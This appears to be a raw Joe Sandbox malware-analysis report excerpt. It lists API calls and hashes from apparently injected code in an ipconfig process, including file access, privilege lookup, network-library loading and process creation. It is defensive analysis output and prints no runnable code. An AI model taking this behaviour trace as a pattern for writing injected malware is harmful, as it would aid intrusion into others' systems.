              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 289 2a185cf-2a18621 call 2a191d0 NtCreateFile
              APIs
              • NtCreateFile.NTDLL(00000060,00000000,.z`,02A13BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02A13BA7,007A002E,00000000,00000060,00000000,00000000), ref: 02A1861D
              Strings
              Memory Dump Source
              • Source File: 0000000F.00000002.506368186.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2a00000_ipconfig.jbxd
              Yara matches
              Similarity
              • API ID: CreateFile
              • String ID: .z`
              • API String ID: 823142352-1441809116
              • Opcode ID: 3b7aba30ef6c615c3673f8c3f112c484dc11ab30b08ca43e4d0db69b0fd3ced0
              • Instruction ID: 3bcea13269334693362161ad02ff0922c3a2671db959d220ea17a457b52c9a12
              • Opcode Fuzzy Hash: 3b7aba30ef6c615c3673f8c3f112c484dc11ab30b08ca43e4d0db69b0fd3ced0
              • Instruction Fuzzy Hash: A301C4B2200108BFCB58CF99DC95EEB77A9AF8C354F158248FA1DD7241C630E851CBA0
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 292 2a185d0-2a185e6 293 2a185ec-2a18621 NtCreateFile 292->293 294 2a185e7 call 2a191d0 292->294 294->293
              APIs
              • NtCreateFile.NTDLL(00000060,00000000,.z`,02A13BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02A13BA7,007A002E,00000000,00000060,00000000,00000000), ref: 02A1861D
              Strings
              Memory Dump Source
              • Source File: 0000000F.00000002.506368186.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2a00000_ipconfig.jbxd
              Yara matches
              Similarity
              • API ID: CreateFile
              • String ID: .z`
              • API String ID: 823142352-1441809116
              • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
              • Instruction ID: d4ac83d49854235a5aa802dac906e26d8327b59cfecf9a1206f808d91caf9947
              • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
              • Instruction Fuzzy Hash: CBF0B2B2200208ABCB48CF88DC94EEB77EDAF8C754F158248BA0D97240C630E851CBA4
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • NtReadFile.NTDLL(02A13D62,5E972F65,FFFFFFFF,02A13A21,?,?,02A13D62,?,02A13A21,FFFFFFFF,5E972F65,02A13D62,?,00000000), ref: 02A186C5
              Memory Dump Source
              • Source File: 0000000F.00000002.506368186.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2a00000_ipconfig.jbxd
              Yara matches
              Similarity
              • API ID: FileRead
              • String ID:
              • API String ID: 2738559852-0
              • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
              • Instruction ID: 90a86e6baa65bf51c1379a1535d0910fecd03b49d025fe18852b0782d434b276
              • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
              • Instruction Fuzzy Hash: B7F0A9B2200108ABCB14DF89DC94DEB77ADAF8C754F158248BE1D97241D630E851CBA0
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • NtReadFile.NTDLL(02A13D62,5E972F65,FFFFFFFF,02A13A21,?,?,02A13D62,?,02A13A21,FFFFFFFF,5E972F65,02A13D62,?,00000000), ref: 02A186C5
              Memory Dump Source
              • Source File: 0000000F.00000002.506368186.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2a00000_ipconfig.jbxd
              Yara matches
              Similarity
              • API ID: FileRead
              • String ID:
              • API String ID: 2738559852-0
              • Opcode ID: ee392e534eff44da077745e3c797d5cf3d0bda81944258abb584fc74e3a700ec
              • Instruction ID: 89617c9f1a388ab7bb06c9a16de038893554baa35883e6e5e7365f115a3f745c
              • Opcode Fuzzy Hash: ee392e534eff44da077745e3c797d5cf3d0bda81944258abb584fc74e3a700ec
              • Instruction Fuzzy Hash: D8F0F9B2200109AFDB04CF89CC84EEB77ADAF8C354F018248BE0D97250C630E851CBA0
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • NtClose.NTDLL(02A13D40,?,?,02A13D40,00000000,FFFFFFFF), ref: 02A18725
              Memory Dump Source
              • Source File: 0000000F.00000002.506368186.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2a00000_ipconfig.jbxd
              Yara matches
              Similarity
              • API ID: Close
              • String ID:
              • API String ID: 3535843008-0
              • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
              • Instruction ID: b7ac4ea09f94fdc2dee1e3a29a53cffff6e1cc2ed739affc36c2da5d1d480c72
              • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
              • Instruction Fuzzy Hash: A0D012752402146BD714EB98CC49E97779DEF44760F154455BA1C5B241C570F500C6E0
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 565f625c5c79168b4112b076a53308e538378d14e7a5657b154c5e8d9b5013f4
              • Instruction ID: 155764f4a095fa81f8076f5c88533c7c182c14b54ff348da639301d71e7d2434
              • Opcode Fuzzy Hash: 565f625c5c79168b4112b076a53308e538378d14e7a5657b154c5e8d9b5013f4
              • Instruction Fuzzy Hash: EF90026135180042D60065A94C15B57000D97D0383F51D115A4154554CC9558861A561
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 1240fd59a5f73a3515c2ba9108b219659321bdf9b8648cd2f3af5ba1ee8bd580
              • Instruction ID: 38a0fab0f584bf6d785434f702a50c87b86cf5f56d4eb549468532aa8407a811
              • Opcode Fuzzy Hash: 1240fd59a5f73a3515c2ba9108b219659321bdf9b8648cd2f3af5ba1ee8bd580
              • Instruction Fuzzy Hash: 0090027134100413D51161994905757000D97D02C1F91D412A4424558D96968952F161
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 801f38400f9436290eaf8f8335927e83c7c447c4c78df39082b3a3c41326a9b5
              • Instruction ID: 12b3e70cd803ea4e2c11e700a4a60ba7a7a9accb63cc07d433c5a7dbdb8819ad
              • Opcode Fuzzy Hash: 801f38400f9436290eaf8f8335927e83c7c447c4c78df39082b3a3c41326a9b5
              • Instruction Fuzzy Hash: 87900261382041525945B1994805557400EA7E02C1791D012A5414950C85669856E661
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 851e6d6c98455095a6e1ef3197f1ccc3294df559db1408ab49e3be92b8d92029
              • Instruction ID: 5da3de8bb9b73e1992dd5634f5941f5eb46791095850fa9056de0441719a0e22
              • Opcode Fuzzy Hash: 851e6d6c98455095a6e1ef3197f1ccc3294df559db1408ab49e3be92b8d92029
              • Instruction Fuzzy Hash: B59002A138100442D50061994815B57000DD7E1381F51D015E5064554D8659CC52B166
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: c3cbe1af980cc12e80d7d0a92815492a5d040192917384ab08e566f66fe13f44
              • Instruction ID: e8e6c5e66ad363f232f699786a2537a0716b7dc8a6b4859072290c47772edbbd
              • Opcode Fuzzy Hash: c3cbe1af980cc12e80d7d0a92815492a5d040192917384ab08e566f66fe13f44
              • Instruction Fuzzy Hash: 7D9002B134100402D54071994805797000D97D0381F51D011A9064554E86998DD5B6A5
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: a34713c59b8eeff4df6108e58465d3c7fef670cc0b4a9f97f20344447081d18a
              • Instruction ID: f78f36430cc4e253b685047490f5fb734af7dfae01d6f28c36c47dba7da22d5c
              • Opcode Fuzzy Hash: a34713c59b8eeff4df6108e58465d3c7fef670cc0b4a9f97f20344447081d18a
              • Instruction Fuzzy Hash: 6890027134108802D5106199880579B000D97D0381F55D411A8424658D86D58891B161
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 09012cec0a39b3f0d8440ac60e6b6d23204efb1befcc8406bd26091bb6c9e771
              • Instruction ID: 809621879378eb179bbf4677e66ea6ee156697f6477a67daf496a5f615f7db6d
              • Opcode Fuzzy Hash: 09012cec0a39b3f0d8440ac60e6b6d23204efb1befcc8406bd26091bb6c9e771
              • Instruction Fuzzy Hash: BC90027134100842D50061994805B97000D97E0381F51D016A4124654D8655C851B561
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: f691b749d4f2d3bb159d931f759e3618c737ea54fdb456d36cfaf4328404aa19
              • Instruction ID: edabb6ff075db51e3783a501019b7fe5912920721929245f0cec8b74ac5c3730
              • Opcode Fuzzy Hash: f691b749d4f2d3bb159d931f759e3618c737ea54fdb456d36cfaf4328404aa19
              • Instruction Fuzzy Hash: 0F90027135114402D51061998805757000D97D1281F51D411A4824558D86D58891B162
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: b52643f0c7f703e62a507c1f25d029360e66f001b6ee8edde09f8c277486d6e9
              • Instruction ID: 621fae9843d010059b3549309f615f8f7b9cbe45d6d7c916d5d613c4fff812ec
              • Opcode Fuzzy Hash: b52643f0c7f703e62a507c1f25d029360e66f001b6ee8edde09f8c277486d6e9
              • Instruction Fuzzy Hash: 0290026935300002D5807199580965B000D97D1282F91E415A4015558CC9558869A361
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: e66c1a467fe7f706a427b9bd7e8d944c2264b7df5b981734b72898e440320a4b
              • Instruction ID: 6b72f6eeed5ab3ca2123bad1d0ed9e8ae8db0cb2b2bfb03a0bf1ae3648f22f0a
              • Opcode Fuzzy Hash: e66c1a467fe7f706a427b9bd7e8d944c2264b7df5b981734b72898e440320a4b
              • Instruction Fuzzy Hash: 5B90027134100402D50065D95809697000D97E0381F51E011A9024555EC6A58891B171
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 162d56f49dc994b526a7ba66d1e5691c064d7be3b82d54a8f740b871e5401364
              • Instruction ID: 1bbfcadef8eb44864cda159de37a56837cbe5a7045d217de18fb3e6edb0d0a4f
              • Opcode Fuzzy Hash: 162d56f49dc994b526a7ba66d1e5691c064d7be3b82d54a8f740b871e5401364
              • Instruction Fuzzy Hash: 0A9002A134200003450571994815667400E97E0281B51D021E5014590DC5658891B165
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: 3491fbb361e25ce38124abe1541927d5d099641c4a04c32a4efe3f4b43eb902a
              • Instruction ID: e2c52d12c37b225461b4c686a7445bcf78dcbd887aff44896001c56f551b3a0c
              • Opcode Fuzzy Hash: 3491fbb361e25ce38124abe1541927d5d099641c4a04c32a4efe3f4b43eb902a
              • Instruction Fuzzy Hash: 86900475351000030505F5DD0F05557004FD7D53D1351D031F5015550CD771CC71F171
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 249 2a172f0-2a1731f 250 2a1732b-2a17332 249->250 251 2a17326 call 2a1a010 249->251 252 2a17338-2a17388 call 2a1a0e0 call 2a09b30 call 2a13e40 250->252 253 2a1740c-2a17412 250->253 251->250 260 2a17390-2a173a1 Sleep 252->260 261 2a173a3-2a173a9 260->261 262 2a17406-2a1740a 260->262 263 2a173d3-2a173f3 261->263 264 2a173ab-2a173d1 call 2a16f20 261->264 262->253 262->260 266 2a173f9-2a173fc 263->266 267 2a173f4 call 2a17120 263->267 264->266 266->262 267->266
              APIs
              • Sleep.KERNELBASE(000007D0), ref: 02A17398
              Strings
              Memory Dump Source
              • Source File: 0000000F.00000002.506368186.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2a00000_ipconfig.jbxd
              Yara matches
              Similarity
              • API ID: Sleep
              • String ID: net.dll$wininet.dll
              • API String ID: 3472027048-1269752229
              • Opcode ID: dfdd02c9d205f7edcce6d90c41715236450bbc0df59608cf7bde5becdf42e346
              • Instruction ID: 8467878a83cb6025388ae1b2c4893c0304dcd1be0cb1151f64556ef298c053bc
              • Opcode Fuzzy Hash: dfdd02c9d205f7edcce6d90c41715236450bbc0df59608cf7bde5becdf42e346
              • Instruction Fuzzy Hash: 9F3190B6641704ABC715DF64CCA0FABF7B9EF48710F00811DFA1A9B241DB30A445CBA0
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 269 2a172e6-2a17332 call 2a1a010 272 2a17338-2a17388 call 2a1a0e0 call 2a09b30 call 2a13e40 269->272 273 2a1740c-2a17412 269->273 280 2a17390-2a173a1 Sleep 272->280 281 2a173a3-2a173a9 280->281 282 2a17406-2a1740a 280->282 283 2a173d3-2a173f3 281->283 284 2a173ab-2a173d1 call 2a16f20 281->284 282->273 282->280 286 2a173f9-2a173fc 283->286 287 2a173f4 call 2a17120 283->287 284->286 286->282 287->286
              APIs
              • Sleep.KERNELBASE(000007D0), ref: 02A17398
              Strings
              Memory Dump Source
              • Source File: 0000000F.00000002.506368186.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2a00000_ipconfig.jbxd
              Yara matches
              Similarity
              • API ID: Sleep
              • String ID: net.dll$wininet.dll
              • API String ID: 3472027048-1269752229
              • Opcode ID: de99a95039616fab975ac0e19144ad7ed8328b7cc4c110fdcc7ee9abe50145c2
              • Instruction ID: e2ba68503889f04c9daa1ad28ad58b3996595adc1275dd1d41551e4950a85cb4
              • Opcode Fuzzy Hash: de99a95039616fab975ac0e19144ad7ed8328b7cc4c110fdcc7ee9abe50145c2
              • Instruction Fuzzy Hash: 88218DB6A41301ABC711DF64C8A1FABFBB9EF48710F008159FA199B281DB70A445CBA1
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 295 2a188d2-2a188f4 298 2a188fc-2a18911 RtlFreeHeap 295->298 299 2a188f7 call 2a191d0 295->299 299->298
              APIs
              • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02A03B93), ref: 02A1890D
              Strings
              Memory Dump Source
              • Source File: 0000000F.00000002.506368186.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2a00000_ipconfig.jbxd
              Yara matches
              Similarity
              • API ID: FreeHeap
              • String ID: .z`
              • API String ID: 3298025750-1441809116
              • Opcode ID: fa4749a25496dd26388f713ecfec600d802b5b35bb1d5694f5eacd24b7120c46
              • Instruction ID: 33451fb6697e9093954001e0d3fc115a75404451f50437232c34642aeb49e726
              • Opcode Fuzzy Hash: fa4749a25496dd26388f713ecfec600d802b5b35bb1d5694f5eacd24b7120c46
              • Instruction Fuzzy Hash: 4EE0D8B82041829FDB08EFA9C9D085F3796AF853147148946E84857345C970D81ACAB2
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 300 2a188e0-2a18911 call 2a191d0 RtlFreeHeap
              APIs
              • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02A03B93), ref: 02A1890D
              Strings
              Memory Dump Source
              • Source File: 0000000F.00000002.506368186.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2a00000_ipconfig.jbxd
              Yara matches
              Similarity
              • API ID: FreeHeap
              • String ID: .z`
              • API String ID: 3298025750-1441809116
              • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
              • Instruction ID: b6a20d5f6475694921570dfc88bf8a6a69d4bbc45447a49222e985a95fbcc03d
              • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
              • Instruction Fuzzy Hash: 13E046B1200208ABDB18EF99CC48EA777ADEF88760F018558FE0C5B241CA30F914CAF0
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 303 2a07307-2a0730b 304 2a0730d 303->304 305 2a0735f-2a07368 303->305 306 2a072b0-2a072bd 304->306 307 2a0730f-2a0735a call 2a1a130 call 2a07280 call 2a199c0 304->307 308 2a07370-2a073a2 call 2a0d3c0 call 2a18770 305->308 310 2a072c3-2a072ca 306->310 311 2a072be call 2a13e40 306->311 307->305 325 2a073a4-2a073ac 308->325 326 2a073d7-2a073df 308->326 314 2a072cc-2a072de PostThreadMessageW 310->314 315 2a072fe-2a07302 310->315 311->310 317 2a072e0-2a072fb call 2a09290 PostThreadMessageW 314->317 318 2a072fd 314->318 317->318 318->315 328 2a073c6-2a073d0 325->328 329 2a073ae-2a073b5 325->329 328->308 332 2a073d2-2a073d5 328->332 329->328 331 2a073b7-2a073be 329->331 331->328 333 2a073c0-2a073c4 331->333 334 2a073fd-2a0740f call 2a18700 332->334 333->328 335 2a073e0-2a073fa call 2a1a0b0 333->335 334->326 340 2a07411-2a0747c call 2a17f80 334->340 335->334 340->326 343 2a07482-2a074de call 2a17fc0 340->343 343->326 346 2a074e4-2a07531 call 2a19660 call 2a19680 call 2a1a3a0 call 2a1a0b0 call 2a13a40 343->346
              APIs
              • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02A072DA
              • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02A072FB
              Memory Dump Source
              • Source File: 0000000F.00000002.506368186.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2a00000_ipconfig.jbxd
              Yara matches
              Similarity
              • API ID: MessagePostThread
              • String ID:
              • API String ID: 1836367815-0
              • Opcode ID: 1b59d593f1bbb02927b9e173bfd06006721682c440f11bd0ae485acaaf1a20ab
              • Instruction ID: 201f2e21f9963e4b2dd2815f49a47823548af021e0a2000878c7919c218da51c
              • Opcode Fuzzy Hash: 1b59d593f1bbb02927b9e173bfd06006721682c440f11bd0ae485acaaf1a20ab
              • Instruction Fuzzy Hash: A961A370940209AFEB25DF64DDC5BEBB7B8EF49314F1004ADE94997281DB70A941CFA2
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              APIs
              • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02A072DA
              • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02A072FB
              Memory Dump Source
              • Source File: 0000000F.00000002.506368186.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2a00000_ipconfig.jbxd
              Yara matches
              Similarity
              • API ID: MessagePostThread
              • String ID:
              • API String ID: 1836367815-0
              • Opcode ID: 6242364d1d39fb105e909873f335ffe36d8bf3a77fb545fb0355dcaf9b4bdb5d
              • Instruction ID: f2b4e87660a1eb51c6fafab347bf9fc7575983d2d3983afeac49224aeaa473ac
              • Opcode Fuzzy Hash: 6242364d1d39fb105e909873f335ffe36d8bf3a77fb545fb0355dcaf9b4bdb5d
              • Instruction Fuzzy Hash: 8F01F731A803297BE720AA949D42FBFB76C5F04F60F140014FF04BA1C1EEA479058AF5
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 567 2a18a75-2a18a78 568 2a18a7a-2a18a7b 567->568 569 2a18a4c-2a18a5a call 2a191d0 567->569 570 2a18ac5-2a18ad2 568->570 571 2a18a7d-2a18a99 568->571 577 2a18a5f-2a18a74 LookupPrivilegeValueW 569->577 575 2a18ada-2a18ae7 570->575 576 2a18ad5 call 2a19240 570->576 573 2a18a9f-2a18ab0 571->573 574 2a18a9a call 2a191d0 571->574 574->573 576->575
              APIs
              • LookupPrivilegeValueW.ADVAPI32(00000000,?,02A0CFB2,02A0CFB2,?,00000000,?,?), ref: 02A18A70
              Memory Dump Source
              • Source File: 0000000F.00000002.506368186.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2a00000_ipconfig.jbxd
              Yara matches
              Similarity
              • API ID: LookupPrivilegeValue
              • String ID:
              • API String ID: 3899507212-0
              • Opcode ID: 03c6ae98afe7917cc1e5836d62b54f9e28321c5488b7360adf4d48e362288bed
              • Instruction ID: 0e85cc55fc8eef1a2111b67c1cd07f692ace8db1a5cc5f8f0f026d51893d1885
              • Opcode Fuzzy Hash: 03c6ae98afe7917cc1e5836d62b54f9e28321c5488b7360adf4d48e362288bed
              • Instruction Fuzzy Hash: FC11C271200244AFE724EF68CC85EEB7BA9EF44760F148599FD4C5B242CA35E915CBE0
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 580 2a09b30-2a09b4c 581 2a09b54-2a09b59 580->581 582 2a09b4f call 2a1af60 580->582 583 2a09b5b-2a09b5e 581->583 584 2a09b5f-2a09b6d call 2a1b380 581->584 582->581 587 2a09b7d-2a09b8e call 2a19710 584->587 588 2a09b6f-2a09b7a call 2a1b600 584->588 593 2a09b90-2a09ba4 LdrLoadDll 587->593 594 2a09ba7-2a09baa 587->594 588->587 593->594
              APIs
              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02A09BA2
              Memory Dump Source
              • Source File: 0000000F.00000002.506368186.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2a00000_ipconfig.jbxd
              Yara matches
              Similarity
              • API ID: Load
              • String ID:
              • API String ID: 2234796835-0
              • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
              • Instruction ID: 0fe453df13dd297accb9bb02bf91241b3ba1e14d8598fdd8edffe3266450b878
              • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
              • Instruction Fuzzy Hash: 38015EB5E4020EABDB10DBA0ED81FDEB3799F44718F0045A5EA0897281FA31EB14CB91
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02A189A4
              Memory Dump Source
